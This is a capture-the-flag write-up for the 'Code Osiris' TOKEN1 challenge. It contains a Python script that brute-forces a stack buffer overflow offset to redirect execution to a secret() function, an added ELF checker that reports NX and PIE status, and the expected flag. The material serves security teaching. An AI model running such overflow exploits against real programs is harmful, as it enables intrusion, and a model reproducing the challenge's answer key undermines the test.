
Code Osiris – TOKEN1

Target: local code_osiris_v1

Background

The binary reads stdin into a fixed-size buffer with NX off and no canary. Overwriting the saved return address with the secret function (at 0x401210) prints the token.
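Before relying on the premise above (executable stack, fixed address for secret()), it is worth confirming what the binary actually declares. The following is an added example, not part of the original writeup or the challenge artifacts: it reads only the ELF64 header and program headers, reports whether the file asserts a non-executable stack (PT_GNU_STACK without the PF_X bit) and whether it is position independent (e_type == ET_DYN), and never executes the target. The two in-memory images it builds are constructed samples, not code_osiris_v1; the script name check_mitigations.py is an assumption.

```python
#!/usr/bin/env python3
# check_mitigations.py -- added example, not part of the original writeup.
# Reports whether an ELF64 binary carries a non-executable stack (NX) and
# whether it is position independent, by reading only the ELF header and
# the program headers. It does not execute the binary.
import struct
import sys

PT_GNU_STACK = 0x6474E551   # program-header type that records stack permissions
PF_X = 0x1                  # "executable" bit in p_flags
ET_EXEC = 2                 # fixed-address executable (addresses such as 0x401210 stay put)
ET_DYN = 3                  # position-independent executable or shared object

def parse_elf64(data: bytes) -> dict:
    """Summarise NX and PIE state of an ELF64 little-endian image held in memory."""
    if len(data) < 64 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("only ELF64 little-endian is handled here")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)

    gnu_stack_present = False
    nx = False   # conservative choice: no PT_GNU_STACK header means the file does not assert NX
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + 8 > len(data):
            raise ValueError("program header table runs past end of image")
        p_type, p_flags = struct.unpack_from("<II", data, off)
        if p_type == PT_GNU_STACK:
            gnu_stack_present = True
            nx = not (p_flags & PF_X)
    return {"nx": nx, "pie": e_type == ET_DYN, "gnu_stack_present": gnu_stack_present}

def check_file(path: str) -> dict:
    """Inspect a binary on disk."""
    with open(path, "rb") as f:
        return parse_elf64(f.read())

def build_sample_elf(e_type: int, stack_flags: int) -> bytes:
    """Construct a minimal ELF64 image (header plus one PT_GNU_STACK entry).
    Synthetic demonstration input, not the challenge binary."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELF64, little-endian, SysV ABI
    ehdr = ident + struct.pack(
        "<HHIQQQIHHHHHH",
        e_type, 62, 1,            # e_type, e_machine (x86-64), e_version
        0x401000, 64, 0,          # e_entry, e_phoff (table follows the header), e_shoff
        0, 64, 56, 1, 64, 0, 0,   # e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    )
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 0x10)
    return ehdr + phdr

def describe(report: dict) -> str:
    """Human-readable one-liner for a parse_elf64() report."""
    nx = "NX enabled" if report["nx"] else "NX disabled (stack executable or unspecified)"
    pie = "PIE" if report["pie"] else "no PIE (fixed load address)"
    return f"{nx}; {pie}"

if __name__ == "__main__":
    # With a path argument, inspect a real file; otherwise show the two constructed samples.
    if len(sys.argv) > 1:
        print(sys.argv[1], "->", describe(check_file(sys.argv[1])))
    else:
        weak = build_sample_elf(ET_EXEC, 0x7)   # RWE stack, fixed address: the writeup's premise
        hard = build_sample_elf(ET_DYN, 0x6)    # RW stack, position independent
        print("sample (weak):", describe(parse_elf64(weak)))
        print("sample (hard):", describe(parse_elf64(hard)))
```

Running it as python3 check_mitigations.py ./code_osiris_v1 tells you whether the fixed 0x401210 address and the executable-stack assumption hold before you spend time on offsets; a PIE or NX-enabled build would need a different approach and, from the defender's side, is exactly what the build flags should produce. Stack canaries are not visible from the headers alone (they show up as a reference to __stack_chk_fail in the symbol or dynamic tables), so this check deliberately stops at NX and PIE.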

From Nothing to Working

  1. Download artifacts from the HQ page, get code_osiris_v1 and helper scripts.
  2. Run the provided brute-force exploit to cycle through common offsets and jump to secret(). The offsets come from common 64-bit stack layouts: 32–136 bytes for small locals, 152–200 to cover the saved RBP and RIP, and 256+ for compilers that reserve larger frames.
  3. When the correct offset is hit, execution flows into secret() and the token is printed.

Command

Run the script below as python3 token1_exploit.py from the directory containing code_osiris_v1 (the binary must be executable). It prints the program's output and exits 0 as soon as the token prefix PCCC appears; if no tested offset works it says so and exits 1.

#!/usr/bin/env python3
# token1_exploit.py
# Brute-forces the distance from the start of the stdin buffer to the saved
# return address, then overwrites that slot with the address of secret().
import struct
import subprocess
import sys

BINARY = "./code_osiris_v1"
SECRET_ADDR = 0x401210      # address of secret() in the non-PIE binary

def p64(x):
    """Pack a 64-bit little-endian value, the layout of a saved return address."""
    return struct.pack("<Q", x)

# Candidate offsets, most common frame sizes first.
offsets = [40, 72, 136, 264, 520, 32, 48, 56, 64, 80, 88, 96, 104, 112, 120, 128, 144, 152, 200, 256, 260, 268]

for off in offsets:
    payload = b"A" * off + p64(SECRET_ADDR)
    try:
        r = subprocess.run([BINARY], input=payload, capture_output=True, timeout=2)
    except subprocess.TimeoutExpired:
        continue                # this offset hung the target; try the next one
    out = r.stdout + r.stderr
    if b"PCCC" in out:          # token prefix means secret() was reached
        sys.stdout.buffer.write(out)
        sys.exit(0)

print("No token with tested offsets.")
sys.exit(1)

Expected Output

Look for the token line:

PCCC{EHbo-4422}